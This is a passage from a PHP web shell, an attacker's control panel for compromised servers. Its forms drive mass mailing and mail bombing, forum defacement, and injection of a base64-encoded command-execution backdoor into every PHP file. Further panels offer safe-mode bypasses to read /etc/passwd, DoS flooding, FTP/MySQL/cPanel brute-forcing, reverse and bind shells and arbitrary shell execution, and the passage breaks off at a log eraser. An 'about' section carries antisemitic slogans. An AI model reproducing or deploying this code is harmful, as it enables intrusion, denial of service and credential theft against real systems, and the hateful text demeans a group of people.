3110 <td style="width:10%;">From</td>
3111 <td style="width:80%;" align="left"><input name="from" class="box" value="Hello@abcd.in" onFocus="if(this.value == 'president@whitehouse.gov')this.value = '';" onBlur="if(this.value=='')this.value='president@whitehouse.gov';"/></td>
3112 </tr>
3113
3114 <tr>
3115 <td style="width:20%;">To</td>
3116 <td style="width:80%;"><input class="box" class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/></td>
3117 </tr>
3118
3119 <tr>
3120 <td style="width:20%;">Subject</td>
3121 <td style="width:80%;"><input type="text" class="box" name="subject" value="Jew Here!!" onFocus="if(this.value == 'Jew Here!!')this.value = '';" onBlur="if(this.value=='')this.value='Jew Here!!';" /></td>
3122 </tr>
3123
3124
3125 <tr>
3126 <td colspan="2">
3127 <textarea name="message" cols="110" rows="10" class="box">Hello !! This is Jew!!!</textarea>
3128 </td>
3129 </tr>
3130
3131
3132 <tr>
3133 <td rowspan="2">
3134 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="sendmail('massmailing',to.value,subject.value,message.value,from.value)" class="but" value=" Send! "/>
3135 </td>
3136 </tr>
3137 </table>
3138 </form></div>
3139 <?php
3140}
3141// Get Domains
3142else if(isset($_REQUEST["symlinkserver"]))
3143{
3144 ?>
3145 <center><table><tr>
3146 <td><a href=javascript:void(0) onClick="getdata('domains')"><font class=txt><b>| Get Domains |</b></font></a></td>
3147 <td><a href=javascript:void(0) onClick="getdata('symlink')"><font class=txt><b>| Symlink Server |</b></font></a></td>
3148 <td><a href=javascript:void(0) onClick="getdata('symlinkfile')"><font class=txt><b>| Symlink File |</b></font></a></td>
3149 <td><a href=javascript:void(0) onClick="getdata('script')"><font class=txt><b>| Script Locator |</b></font></a></td>
3150 </tr></table></center><br>
3151 <div id="showdata"></div><?php
3152}
3153// Forum Manager
3154else if(isset($_REQUEST["forum"]))
3155{ ?>
3156 <center><table><tr><td><a href=# onClick="getdata('defaceforum')"><font class=txt size="4">| Forum Defacer |</font></a></td>
3157 <td><a href=# onClick="getdata('passwordchange')"><font class=txt size="4">| Forum Password Changer |</font></a></td>
3158 </tr></table></center><br><div id="showdata"></div>
3159 <?php
3160}
3161// Sec info
3162else if(isset($_GET['secinfo']))
3163{ ?><div id=showdata></div>
3164<center><div id="showmydata"></div>
3165</center>
3166<br><center><font color =red size=5>Server security information</font><br><br></center>
3167 <table style="width:100%;border-color:#333333;" border="1">
3168 <tr>
3169 <td style="width:7%;">Curl</td>
3170 <td style="width:7%;">Oracle</td>
3171 <td style="width:7%;">MySQL</td>
3172 <td style="width:7%;">MSSQL</td>
3173 <td style="width:7%;">PostgreSQL</td>
3174 <td style="width:12%;">Open Base Directory</td>
3175 <td style="width:10%;">Safe_Exec_Dir</td>
3176 <td style="width:7%;">PHP Version</td>
3177 <td style="width:7%;">Magic Quotes</td>
3178 <td style="width:7%;">Server Admin</td>
3179 </tr>
3180 <tr>
3181 <td style="width:7%;"><font class="txt"><?php curlinfo(); ?></font></td>
3182 <td style="width:7%;"><font class="txt"><?php oracleinfo(); ?></font></td>
3183 <td style="width:7%;"><font class="txt"><?php mysqlinfo(); ?></font></td>
3184 <td style="width:7%;"><font class="txt"><?php mssqlinfo(); ?></font></td>
3185 <td style="width:7%;"><font class="txt"><?php postgresqlinfo(); ?></font></td>
3186 <td style="width:12%;"><font class="txt"><?php echo $basedir; ?></font></td>
3187 <td style="width:10%;"><font class="txt"><?php if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font >NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};} ?></font></td>
3188 <td style="width:7%;"><font class="txt"><?php phpver(); ?></font></td>
3189 <td style="width:7%;"><font class="txt"><?php magic_quote(); ?></font></td>
3190 <td style="width:7%;"><font class="txt"><?php serveradmin(); ?></font></td>
3191 </tr>
3192</table><br> <?php
3193 mysecinfo();
3194}
3195// Code Injector
3196
3197else if(isset($_GET['injector']))
3198{
3199 ?>
3200 <form method='POST'>
3201 <table id="margins">
3202 <tr>
3203 <td width="100" class="title">
3204 Directory
3205 </td>
3206 <td>
3207 <input class="box" name="pathtomass" value="<?php echo getcwd().$SEPARATOR; ?>" />
3208 </td>
3209
3210 </tr>
3211 <tr>
3212 <td class="title">
3213 Mode
3214 </td>
3215 <td>
3216 <select style="width: 400px;" name="mode" class="box">
3217 <option value="Apender">Apender</option>
3218 <option value="Overwriter">Overwriter</option>
3219 </select>
3220 </td>
3221 </tr>
3222 <tr>
3223 <td class="title">
3224 File Type
3225 </td>
3226 <td>
3227 <input type="text" class="box" name="filetype" value="php" onBlur="if(this.value=='')this.value='php';" />
3228 </td>
3229 </tr>
3230 <tr>
3231 <td>Create A backdoor by injecting this code in every php file of current directory</td>
3232 </tr>
3233
3234 <tr>
3235 <td colspan="2">
3236 <textarea name="injectthis" cols="110" rows="10" class="box"><?php echo base64_decode("PD9waHAgJGNtZCA9IDw8PEVPRA0KY21kDQpFT0Q7DQoNCmlmKGlzc2V0KCRfUkVRVUVTVFskY21kXSkpIHsNCnN5c3RlbSgkX1JFUVVFU1RbJGNtZF0pOyB9ID8+"); ?></textarea>
3237 </td>
3238 </tr>
3239 <tr>
3240 <td rowspan="2">
3241 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="codeinjector(pathtomass.value,mode.value,filetype.value,injectthis.value)" class="but" value="Inject "/>
3242 </td>
3243 </tr>
3244 </form>
3245 </table><div id="showinject"</div>
3246 <?php
3247}
3248// Bypass
3249else if(isset($_GET["bypass"]))
3250{
3251 ?><center><div id="showbyp"></div></center>
3252 <table cellpadding="7" align="center" border="3" style="width:70%;border-color:#333333;">
3253 <tr>
3254 <td align="center" colspan="2"><font color="#FF0000" size="3">Safe mode bypass</font></td>
3255 </tr>
3256 <tr>
3257 <td align="center">
3258 <p>Using copy() function</p>
3259 <form onSubmit="bypassfun('copy',copy.value);return false;">
3260 <input type="text" name="copy" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('copy',copy.value)" value="bypass" class="but">
3261 </form>
3262 </td>
3263 <td align="center">
3264 <p>Using imap() function</p>
3265 <form onSubmit="bypassfun('imap',imap.value);return false;">
3266 <input type="text" name="imap" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('imap',imap.value)" value="bypass" class="but">
3267 </form>
3268 </td>
3269 </tr>
3270
3271 <tr>
3272 <td align="center">
3273 <p>Using sql() function</p>
3274 <form onSubmit="bypassfun('sql',sql.value);return false;">
3275 <input type="text" name="sql" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('sql',sql.value)" value="bypass" class="but">
3276 </form>
3277 </td>
3278 <td align="center">
3279 <p>Using Curl() function</p>
3280 <form onSubmit="bypassfun('curl',curl.value);return false;">
3281 <input type="text" name="curl" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('curl',curl.value)" value="bypass" class="but">
3282 </form>
3283 </td>
3284 </tr>
3285
3286 <tr>
3287 <td align="center">
3288 <p>Bypass using include()</p>
3289 <form onSubmit="bypassfun('include',include.value);return false;">
3290 <input type="text" name="include" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('include',include.value)" value="bypass" class="but">
3291 </form>
3292 </td>
3293 <td align="center">
3294 <p>Using id() function</p>
3295 <form onSubmit="bypassfun('id',id.value);return false;">
3296 <input type="text" name="id" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('id',id.value)" value="bypass" class="but">
3297 </form>
3298 </td>
3299 </tr>
3300
3301 <tr>
3302 <td align="center">
3303 <p>Using tempnam() function</p>
3304 <form onSubmit="bypassfun('tempnam',tempname.value);return false;">
3305 <input type="text" name="tempname" value="../../../etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('tempnam',tempname.value)" value="bypass" class="but">
3306 </form>
3307 </td>
3308 <td align="center">
3309 <p>Using symlink() function</p>
3310 <form onSubmit="bypassfun('symlnk',sym.value);return false;">
3311 <input type="text" name="sym" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('symlnk',sym.value)" value="bypass" class="but">
3312 </form>
3313 </td>
3314 </tr>
3315 <tr>
3316 <td colspan=2 align="center">
3317 <p>Using Bypass function</p>
3318 <form onSubmit="bypassfun('newtype',newtype.value,optiontype.value);return false;">
3319 <input type="text" name="newtype" value="/etc/passwd" class="sbox">
3320 <select id="optiontype" class=sbox>
3321 <option value="tac">tac</option>
3322 <option value="more">more</option>
3323 <option value="less">less</option>
3324 <option value="rev">rev</option>
3325 <option value="xxd">xxd</option>
3326 </select>
3327 <input type="button" OnClick="bypassfun('newtype',newtype.value,optiontype.value)" value="bypass" class="but">
3328 </form>
3329 </td>
3330 </tr>
3331 </table>
3332 </form>
3333 <?php
3334}
3335//fuzzer
3336else if(isset($_GET['fuzz']))
3337{
3338 ?>
3339 <form method="GET">
3340 <table id="margins">
3341 <tr>
3342 <td width="400" class="title">
3343 IP
3344 </td>
3345 <td>
3346 <input class="box" name="myip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
3347 </td>
3348 </tr>
3349
3350 <tr>
3351 <td class="title">
3352 Port
3353 </td>
3354 <td>
3355 <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
3356 </td>
3357 </tr>
3358
3359 <tr>
3360 <td class="title">
3361 Timeout
3362 </td>
3363 <td>
3364 <input type="text" class="box" name="time" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';"/>
3365 </td>
3366 </tr>
3367
3368
3369 <tr>
3370 <td class="title">
3371 No of times
3372 </td>
3373 <td>
3374 <input type="text" class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';" />
3375 </td>
3376 </tr>
3377
3378 <tr>
3379 <td class="title">
3380 Message (The message Should be long and it will be multiplied with the value after it)
3381 </td>
3382 <td>
3383 <input class="box" name="message" value="%S%x--Some Garbage here --%x%S" onFocus="if(this.value == '%S%x--Some Garbage here --%x%S')this.value = '';" onBlur="if(this.value=='')this.value='%S%x--Some Garbage here --%x%S';"/>
3384 </td>
3385 <td>
3386 x
3387 </td>
3388 <td width="20">
3389 <input style="width: 30px;" class="box" name="messageMultiplier" value="10" />
3390 </td>
3391 </tr>
3392
3393 <tr>
3394 <td rowspan="2">
3395 <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="button" onClick="dos('fuzzer',myip.value,port.value,time.value,times.value,message.value,messageMultiplier.value)" class="but" value=" Submit "/>
3396 </td>
3397 </tr>
3398 </table>
3399 </form><div id="showdos"></div>
3400 <?php
3401}
3402// Zone-h Poster
3403 else if(isset($_GET["zone"]))
3404 {
3405 if(!function_exists('curl_version'))
3406 {
3407 echo "<pre style='margin-top:5px'><center><font >PHP CURL NOT EXIST</font></center></pre>";
3408 }
3409 ?>
3410 <center><font size="4" color="#FF0000">Zone-h Poster</font></center>
3411 <form action="<?php echo $self; ?>" method="post">
3412 <table align="center" cellpadding="5" border="0">
3413 <tr>
3414 <td>
3415 <input type="text" name="defacer" value="Attacker" class="box" /></td></tr>
3416 <tr><td>
3417 <select name="hackmode" class="box">
3418 <option >--------SELECT--------</option>
3419 <option value="1">known vulnerability (i.e. unpatched system)</option>
3420 <option value="2" >undisclosed (new) vulnerability</option>
3421 <option value="3" >configuration / admin. mistake</option>
3422 <option value="4" >brute force attack</option>
3423 <option value="5" >social engineering</option>
3424 <option value="6" >Web Server intrusion</option>
3425 <option value="7" >Web Server external module intrusion</option>
3426 <option value="8" >Mail Server intrusion</option>
3427 <option value="9" >FTP Server intrusion</option>
3428 <option value="10" >SSH Server intrusion</option>
3429 <option value="11" >Telnet Server intrusion</option>
3430 <option value="12" >RPC Server intrusion</option>
3431 <option value="13" >Shares misconfiguration</option>
3432 <option value="14" >Other Server intrusion</option>
3433 <option value="15" >SQL Injection</option>
3434 <option value="16" >URL Poisoning</option>
3435 <option value="17" >File Inclusion</option>
3436 <option value="18" >Other Web Application bug</option>
3437 <option value="19" >Remote administrative panel access bruteforcing</option>
3438 <option value="20" >Remote administrative panel access password guessing</option>
3439 <option value="21" >Remote administrative panel access social engineering</option>
3440 <option value="22" >Attack against administrator(password stealing/sniffing)</option>
3441 <option value="23" >Access credentials through Man In the Middle attack</option>
3442 <option value="24" >Remote service password guessing</option>
3443 <option value="25" >Remote service password bruteforce</option>
3444 <option value="26" >Rerouting after attacking the Firewall</option>
3445 <option value="27" >Rerouting after attacking the Router</option>
3446 <option value="28" >DNS attack through social engineering</option>
3447 <option value="29" >DNS attack through cache poisoning</option>
3448 <option value="30" >Not available</option>
3449 </select>
3450 </td></tr>
3451 <tr><td>
3452 <select name="reason" class="box">
3453 <option >--------SELECT--------</option>
3454 <option value="1" >Heh...just for fun!</option>
3455 <option value="2" >Revenge against that website</option>
3456 <option value="3" >Political reasons</option>
3457 <option value="4" >As a challenge</option>
3458 <option value="5" >I just want to be the best defacer</option>
3459 <option value="6" >Patriotism</option>
3460 <option value="7" >Not available</option>
3461 </select></td></tr>
3462 <tr><td>
3463 <textarea name="domain" class="box" cols="47" rows="9">List Of Domains</textarea></td></tr>
3464 <tr><td>
3465 <input type="button" onClick="zoneh(defacer.value,hackmode.value,reason.value,domain.value)" class="but" value="Send Now !" /></td></tr></table>
3466 </form><div id="showzone"></div>
3467 <?php }
3468//DDos
3469 else if(isset($_GET['dos']))
3470 {
3471 ?>
3472 <form method="GET">
3473 <table id="margins">
3474 <tr>
3475 <td width="400" class="title">
3476 IP
3477 </td>
3478 <td>
3479 <input class="box" name="myip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
3480 </td>
3481 </tr>
3482
3483 <tr>
3484 <td class="title">
3485 Port
3486 </td>
3487 <td>
3488 <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
3489 </td>
3490 </tr>
3491
3492 <tr>
3493 <td class="title">
3494 Timeout <font >(Time in seconds)</font>
3495 </td>
3496 <td>
3497 <input type="text" class="box" name="timeout" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';" />
3498 </td>
3499 </tr>
3500 <tr>
3501 <td class="title">
3502 Execution Time <font >(Time in seconds)</font>
3503 </td>
3504 <td>
3505 <input type="text" class="box" name="exTime" value="10" onFocus="if(this.value == '10')this.value = '';" onBlur="if(this.value=='')this.value='10';"/>
3506 </td>
3507 </tr>
3508 <tr>
3509 <td class="title">
3510 No of Bytes per/packet
3511 </td>
3512 <td>
3513 <input type="text" class="box" name="noOfBytes" value="999999" onFocus="if(this.value == '999999')this.value = '';" onBlur="if(this.value=='')this.value='999999';"/>
3514 </td>
3515 </tr>
3516 <tr>
3517 <td rowspan="2">
3518 <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="button" onClick="dos('dosser',myip.value,port.value,timeout.value,exTime.value,noOfBytes.value,'null')" class="but" value=" Attack >> "/>
3519 </td>
3520 </tr>
3521 </table>
3522 </form><div id="showdos"></div>
3523 <?php
3524}
3525else if(isset($_GET['mailbomb']))
3526{ ?>
3527 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('bomb')"><font class=txt size="4">| Mail Bomber |</font></a></td>
3528 <td><a href=javascript:void(0) onClick="getdata('mail')"><font class=txt size="4">| Mass Mailer |</font></a></td></tr></table></center><br><div id=showdata></div>
3529<?php
3530}
3531else if(isset($_GET['tools']))
3532 {
3533 ?>
3534 <center><br><form onSubmit="getport(host.value,protocol.value);return false;">
3535 <table cellpadding="5" border="3" style="border-color:#333333; width:50%;">
3536 <tr>
3537 <td colspan="2" align="center"><b><font size='4' color="#FF0000">Port Scanner<br></font></b></td>
3538 </tr>
3539 <tr>
3540 <td align="center">
3541 <input class="sbox" type='text' name='host' value='<?php echo $_SERVER["SERVER_ADDR"]; ?>' >
3542 </td>
3543 <td align="center">
3544 <select class="sbox" name='protocol'>
3545 <option value='tcp'>tcp</option>
3546 <option value='udp'>udp</option>
3547 </select>
3548 </td>
3549 <tr>
3550 <td colspan="2" align="center"><input class="but" type='button' onClick="getport(host.value,protocol.value)" value='Scan Ports'></td>
3551 </tr>
3552 </form>
3553 <tr><td colspan=2><div id="showports"></div>
3554 </td></tr></table>
3555
3556 <br>
3557 <form onSubmit="bruteforce(prototype.value,serverport.value,login.value,dict.value);return false;">
3558 <table cellpadding="5" border="2" style="border-color:#333333; width:50%;">
3559 <tr>
3560 <td colspan="2" align="center"><font size="4">BruteForce</font></td>
3561 </tr>
3562 <tr>
3563 <td>Type : </td>
3564 <td>
3565 <select name="prototype" class="sbox">
3566 <option value="ftp">FTP</option>
3567 <option value="mysql">MYSQL</option>
3568 <option value="postgresql">PostgreSql</option>
3569 </select>
3570 </td>
3571 </tr>
3572 <tr>
3573 <td>Server <b>:</b> Port : </td>
3574 <td><input type="text" name="serverport" value="<?php echo $_SERVER["SERVER_ADDR"]; ?>" class="sbox"></td>
3575 </tr>
3576 <tr>
3577 <td valign="middle">Brute type : </td>
3578 <td><label><input type=radio name=mytype value="1" checked> /etc/passwd</label><label><input type=checkbox id="reverse" name=reverse value=1 checked> reverse (login -> nigol)</label><hr color="#1B1B1B">
3579 <label><input type=radio name=mytype value="2"> Dictionary</label><br>
3580 Login : <input type="text" name="login" value="root" class="sbox"><br>
3581 Dictionary : <input type="text" name="dict" value="<?php echo getcwd() . $directorysperator; ?>passwd.txt" class="sbox">
3582 </td>
3583 </tr>
3584 <tr>
3585 <td colspan="2" align="center"><input type="button" onClick="bruteforce(prototype.value,serverport.value,login.value,dict.value)" value="Attack >>" class="but"></td>
3586 </tr>
3587 </form><tr><td colspan="2" id="showbrute"></td></tr>
3588 </table>
3589 </center><br>
3590 <?php
3591}
3592else if (isset($_GET["phpc"]))
3593{
3594 ?>
3595 <div id="showresult"></div>
3596 <form name="frm">
3597 <textarea name="code" class="box" cols="120" rows="10">phpinfo();</textarea>
3598 <br /><br />
3599 <input name="submit" value="Execute This COde! " class="but" onClick="execode(code.value)" type="button" />
3600 <label><input type="checkbox" id="intext" name="intext" value="disp"> <font class=txt size="3">Display in Textarea</font></label>
3601 </form>
3602 <?php
3603}
3604else if(isset($_GET["exploit"]))
3605{
3606 if(!isset($_GET["rootexploit"]))
3607 {
3608 ?>
3609 <center>
3610 <form action="<?php echo $self; ?>" method="get" target="_blank">
3611 <input type="hidden" name="exploit">
3612 <table border="1" cellpadding="5" cellspacing="4" style="width:50%;border-color:#333333;">
3613 <tr>
3614 <td style="height:60px;">
3615 <font size="4" class=txt>Select Website</font></td><td>
3616 <p><select id="rootexploit" name="rootexploit" class="box">
3617 <option value="exploit-db">Exploit-db</option>
3618 <option value="packetstormsecurity">Packetstormsecurity</option>
3619 <option value="exploitsearch">Exploitsearch</option>
3620 <option value="shodanhq">Shodanhq</option>
3621 </select></p></td></tr><tr><td colspan="2" align="center" style="height:40px;">
3622 <input type="submit" value="Search" class="but"></td></tr></table>
3623 </form></center><br>
3624
3625 <?php
3626 }
3627 else
3628 {
3629 //exploit search
3630 $Lversion = php_uname(r);
3631 $OSV = php_uname(s);
3632 if(eregi('Linux',$OSV))
3633 {
3634 $Lversion=substr($Lversion,0,6);
3635 if($_GET['rootexploit'] == "exploit-db")
3636 {
3637 header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=Linux+Kernel+$Lversion");
3638 }
3639 else if($_GET['rootexploit'] == "packetstormsecurity")
3640 {
3641 header("Location:http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=Linux+Kernel+$Lversion");
3642 }
3643 else if($_GET['rootexploit'] == "exploitsearch")
3644 {
3645 header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=Linux+Kernel+$Lversion");
3646 }
3647 else if($_GET['rootexploit'] == "shodanhq")
3648 {
3649 header("Location:http://www.shodanhq.com/exploits?q=Linux+Kernel+$Lversion");
3650 }
3651 }
3652 else
3653 {
3654 $Lversion=substr($Lversion,0,3);
3655 if($_GET['rootexploit'] == "exploit-db")
3656 {
3657 header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$OSV+Lversion");
3658 }
3659 else if($_GET['rootexploit'] == "packetstormsecurity")
3660 {
3661 header("Location:http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=$OSV+Lversion");
3662 }
3663 else if($_GET['rootexploit'] == "exploitsearch")
3664 {
3665 header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=$OSV+Lversion");
3666 }
3667 else if($_GET['rootexploit'] == "shodanhq")
3668 {
3669 header("Location:http://www.shodanhq.com/exploits?q=$OSV+Lversion");
3670 }
3671 }
3672 //End of Exploit search
3673 }
3674}
3675// Connect
3676else if(isset($_REQUEST['connect']))
3677{
3678 ?>
3679 <form action='<?php echo $self; ?>' method='POST' >
3680 <table style="width:50%" align="center" >
3681 <tr>
3682 <th colspan="1" width="50px">Reverse Shell</th>
3683 <th colspan="1" width="50px">Bind Shell</th>
3684 </tr>
3685 <tr>
3686 <td>
3687 <table style="border-spacing: 6px;">
3688 <tr>
3689 <td>IP </td>
3690 <td>
3691 <input type="text" class="box" style="width: 200px;" name="ip" value="<?php yourip();?>" />
3692 </td>
3693 </tr>
3694 <tr>
3695 <td>Port </td>
3696 <td><input style="width: 200px;" class="box" name="port" size='5' value="9891"/></td>
3697 </tr>
3698 <tr>
3699 <td style="vertical-align:top;">Use:</td>
3700 <td><select style="width: 95px;" name="lang" class="sbox">
3701 <option value="perl">Perl</option>
3702 <option value="python">Python</option>
3703 <option value="php">PHP</option>
3704 </select>
3705 <input type="submit" style="width: 90px;" class="but" value="Connect!" name="backconnect"/></td>
3706 </tr>
3707 </table> </form>
3708 </td>
3709
3710 <td style="vertical-align:top;">
3711 <form method='post' >
3712 <table style="border-spacing: 6px;">
3713 <tr>
3714 <td>Port</td>
3715 <td>
3716 <input style="width: 200px;" class="box" name="port" value="9891" />
3717 </td>
3718 </tr>
3719 <tr>
3720 <td>Password </td>
3721 <td>
3722 <input style="width: 200px;" class="box" name="passwd" value="Jew"/>
3723 </td>
3724 <tr>
3725 <td>Using</td>
3726 <td>
3727 <select style="width: 95px;" name="lang" id="lang" class="sbox">
3728 <option value="perl">Perl</option>
3729 <option value="c">C</option>
3730 </select>
3731 <input style="width: 90px;" class="but" type="submit" name="backdoor" value=" Bind "/></td>
3732 </tr>
3733 </table>
3734 </td>
3735 </form>
3736 </tr>
3737 <tr><td colspan=2><font color="#FF0000">Click "Connect" only after open port for it.Use NetCat, run "nc -l -n -v -p 9891"!<br>Click "Bind", use netcat and give it the command 'nc <?php yourip(); ?> 9891"!</font></td></tr>
3738 </table>
3739
3740 <?php
3741 }
3742
3743else if(isset($_REQUEST['404']))
3744{
3745 ?>
3746 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('404new')"><font class=txt size="4">| Set Your 404 Page |</font></a></td>
3747 <td><a href=javascript:void(0) onClick="getdata('404page')"><font class=txt size="4">| Set Specified 404 Page |</font></a></td>
3748 </tr></table></center><br>
3749 <div id="showdata"></div>
3750 <?php
3751}
3752else if(isset($_GET['about']))
3753 { ?>
3754 <center>
3755 <p><font size=6><u>J e w</u></font><br>
3756 <font size=5>-Blame the Jews!-</font>
3757 <div style='font-family: Courier New; font-size: 10px;'><font class=txt ><pre>
3758
3759 - -- -
3760 -- -- --
3761 -- --
3762 --- ---
3763 ------
3764 ----
3765 ----
3766 ------
3767-------
3768--- --
3769 -- ---
3770 -- -----
3771 --- --- ---
3772 --- --- ---
3773-- --------- --
3774-- ------- --
3775 -- ---- --
3776 -- --- --
3777 -- -- --
3778 --- --- -- ---
3779 ------ ------
3780 ---- ----
3781
3782
3783 </pre></font></div></center>
3784 <font class="txt">Blame the Jews!</font><br><br><center><font size=5>GREETZ To All Jews</font><br><font size=6>| जय महाकाल | | जय हिन्द |</font></center><br>
3785 <?php }
3786else if(isset($_GET['database']))
3787{ ?>
3788 <form onSubmit="mydatabase(server.value,username.value,password.value);return false;">
3789 <table id="datatable" style="width:90%;" cellpadding="4" align="center">
3790 <tr>
3791 <td colspan="2">Connect To Database</td>
3792 </tr>
3793 <tr>
3794 <td>Server Address :</td>
3795 <td><input type="text" class="box" name="server" value="localhost"></td>
3796 </tr>
3797 <tr>
3798 <td>Username :</td>
3799 <td><input type="text" class="box" name="username" value="root"></td>
3800 </tr>
3801 <tr>
3802 <td>Password:</td>
3803 <td><input type="text" class="box" name="password" value=""></td>
3804 </tr>
3805
3806 <tr>
3807 <td></td>
3808 <td><input type="button" onClick="mydatabase(server.value,username.value,password.value)" value=" Connect " name="executeit" class="but"></td>
3809 </tr>
3810 </table>
3811 </form>
3812 <div id="showsql"></div>
3813<?php
3814}
3815// Cpanel Cracker
3816 else if(isset($_REQUEST['cpanel']))
3817 {
3818 $cpanel_port="2082";
3819 $connect_timeout=5;
3820 ?>
3821 <center>
3822 <form method=post>
3823 <table style="width:50%;border-color:#333333;" border=1 cellpadding=4>
3824 <tr>
3825 <td align=center colspan=2>Target : <input type=text name="server" value="localhost" class=sbox></td>
3826 </tr>
3827 <tr>
3828 <td align=center>User names</td><td align=center>Password</td>
3829 </tr>
3830 <tr>
3831 <td align=center><textarea name=username rows=25 cols=22 class=box><?php
3832 if($os != "Windows")
3833 {
3834 if(@file('/etc/passwd'))
3835 {
3836 $users = file('/etc/passwd');
3837 foreach($users as $user)
3838 {
3839 $user = explode(':', $user);
3840 echo $user[0] . "\n";
3841 }
3842 }
3843 else
3844 {
3845 $temp = "";
3846 $val1 = 0;
3847 $val2 = 1000;
3848 for(;$val1 <= $val2;$val1++)
3849 {
3850 $uid = @posix_getpwuid($val1);
3851 if ($uid)
3852 $temp .= join(':',$uid)."\n";
3853 }
3854
3855 $temp = trim($temp);
3856
3857 if($file5 = fopen("test.txt","w"))
3858 {
3859 fputs($file5,$temp);
3860 fclose($file5);
3861
3862 $file = fopen("test.txt", "r");
3863 while(!feof($file))
3864 {
3865 $s = fgets($file);
3866 $matches = array();
3867 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
3868 $matches = str_replace("home/","",$matches[1]);
3869 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
3870 continue;
3871 echo $matches;
3872 }
3873 fclose($file);
3874 }
3875 }
3876 }
3877
3878 ?></textarea></td><td align=center><textarea name=password rows=25 cols=22 class=box></textarea></td>
3879 </tr>
3880 <tr>
3881 <td align=center colspan=2>Guess options : <label><input name="cracktype" type="radio" value="cpanel" checked> Cpanel(2082)</label><label><input name="cracktype" type="radio" value="ftp"> Ftp(21)</label><label><input name="cracktype" type="radio" value="telnet"> Telnet(23)</label></td>
3882 </tr>
3883 <tr>
3884 <td align=center colspan=2>Timeout delay : <input type="text" name="delay" value=5 class=sbox></td>
3885 </tr>
3886 <tr>
3887 <td align=center colspan=2><input type="submit" name="cpanelattack" value=" Go " class=but></td>
3888 </tr>
3889 </table>
3890 </form>
3891 </center>
3892 <?php
3893}
3894else if(isset($_REQUEST['malattack']))
3895{
3896 ?><input type="hidden" id="malpath" value="<?php echo $_GET["dir"]; ?>">
3897 <center><table><tr><td><a href=# onClick="getdata('malware')"><font class=txt size="4">| Malware Attack |</font></a></td>
3898 <td><a href=# onClick="getdata('codeinsert')"><font class=txt size="4">| Insert Own Code |</font></a></td></tr></table></center><br>
3899 <div id="showdata"></div>
3900 <?php
3901}
3902else if(isset($_GET["com"]))
3903{
3904 echo "<br>";
3905 ob_start();
3906 eval("phpinfo();");
3907 $b = ob_get_contents();
3908 ob_end_clean();
3909 $a = strpos($b,"<body>")+6; // yeah baby,, your body is wonderland ;-)
3910 $z = strpos($b,"</body>");
3911 $s_result = "<div class='myphp'>".substr($b,$a,$z-$a)."</div>";
3912 echo $s_result;
3913}
3914else if(isset($_GET['execute']))
3915{
3916 $comm = $_GET['execute'];
3917 chdir($_GET['executepath']);
3918 $check = shell_exec($comm);
3919
3920 echo "<center><textarea id=showexecute cols=120 rows=20 class=box>" . $check . "</textarea></center>";
3921
3922 ?>
3923 <BR><BR><center><form onSubmit="executemyfn('<?php echo addslashes($_GET['executepath']); ?>',execute.value);return false;">
3924 <input type="text" class="box" name="execute">
3925 <input type="button" onClick="executemyfn('<?php echo addslashes($_GET['executepath']); ?>',execute.value)" value="Execute" class="but"></form></center>
3926 <?php
3927}
3928else if(isset($_GET['mycmd']))
3929{
3930 if($_GET['mycmd']=="logeraser")
3931 {
